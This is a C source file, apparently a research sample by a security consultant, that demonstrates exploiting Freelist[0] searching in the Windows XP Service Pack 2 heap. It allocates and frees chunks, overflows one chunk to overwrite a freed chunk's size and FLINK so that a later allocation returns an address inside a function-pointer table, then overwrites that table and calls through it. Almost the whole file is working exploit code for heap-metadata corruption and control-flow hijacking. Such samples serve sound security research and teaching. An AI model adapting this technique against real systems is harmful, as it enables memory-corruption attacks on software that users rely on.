/*
	Sample2.c
	Exploiting Freelist[0] On XP Service Pack 2 
	brett.moore@security-assessment.com

	Exploiting Freelist[0] Searching

	Modify the header of a chunk that sits in freelist[0]
	This sample overwrites the header of the first chunk in freelist[0]

  	The header is overwritten with a size that is too small for the request.
	The FLINK is overwritten with the location that will be returned to the alloc.

*/ 
#include <stdio.h>
#include <windows.h>


DWORD func[20];
long hHeap;


void callback1()
{
	printf("Callback 1...\n");
}
void callback2()
{
	printf("Callback 2...\n");
}
void callback3()
{
	printf("Callback 3...\n");
}
void callback4()
{
	printf("Callback 4...\n");
}
void BlowHeap()
{
	char *a,*b,*c;
	char overflow[0x3000];
	DWORD newFLINK;			// The address that will be returned

	
	printf("Alloc A\n");	// Alloc a chunk
	a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
	printf("a=%x\tb=%x\tc=%x\n",a,b,c);
	
	printf("Alloc B\n");	// Alloc a large chunk so freed to freelist[0]
	b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x1200);
	printf("a=%x\tb=%x\tc=%x\n",a,b,c);
		
	printf("Alloc C\n"); // Alloc a 2nd chunk so that B is not coalesced
	c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
	printf("a=%x\tb=%x\tc=%x\n",a,b,c);

	printf("Freeing b\n");	// Free B to feelist[0]
	HeapFree(hHeap,0,b);


	printf("Overflowing chunk A\n"); // Overflow chunk A, overwrite header of last free chunk

	newFLINK = &func;				// Set the new flink
	newFLINK += 8;					// Adjust


	// Set up overflow
	memset(overflow,0x48,0x20);
	
	overflow[0x10] = 0x01;	// Size of this block (SMALL)
	overflow[0x11] = 0x00;
	overflow[0x12] = 0x01;	// Size of previous block
	overflow[0x13] = 0x00;

	overflow[0x14] = 0x80;		
	overflow[0x15] = 0x80;
	overflow[0x16] = 0x80;	
	overflow[0x17] = 0x80;

	
	*(DWORD *) &overflow[0x18] = newFLINK;		// Put it in FLINK

	// Do the overflow
	memcpy(a,overflow,0x20-4);		// Overwrite FLINK but not BLINK


	// When block B is allocated, the overwritten chunk will be checked.
	// The address newFLINK will be returned to the alloc
	printf("Alloc B\n");
	b = HeapAlloc(hHeap,0,0x20);
	printf("a=%x\tb=%x\tc=%x\n",a,b,c);
		
	// Any data written into B will overwrite the data at newFlink
	strcpy(b,"XXXXXXXXXXXXXXXX");

}

void create_vTable()
{
	int x;

	printf("Creating Virtual Function Table\n");


	(DWORD) func[0] = (DWORD) &callback1;
	(DWORD) func[1] = (DWORD) &callback2;
	(DWORD) func[2] = (DWORD) &callback3;
	(DWORD) func[3] = (DWORD) &callback4;
	
	for(x=4;x<20;x++)
		(DWORD) func[x] = (DWORD) &callback1;
	
	func[0]=5;
	func[1]=6;
}

int main(int argc,char *argv[])
{
	

	printf("===========================================\n");
	printf("Exploiting Freelist[0] On XP Service Pack 2\n");
	printf("brett.moore@security-assessment.com\n");
	printf("Starting Sample2.c\n");
	printf("\tExploiting Freelist[0] Searching\n");
	printf("===========================================\n\n");


	hHeap = HeapCreate(0,0,0);
	printf("Heap created: 0x%xh\n",hHeap);

	create_vTable();	
 	printf("vTable @ 0x%xh\n",&func);
	
	// Call through the vTable
	printf("Doing vTable call\n");
	_asm call func[4*2];

	BlowHeap();
	
	// Call through the vTable
	printf("Doing vTable call\n");
	_asm call func[4*2];

		
	printf("Destroying Heap\n");
	HeapDestroy(hHeap);

	printf("Exiting\n");
	exit(0);



}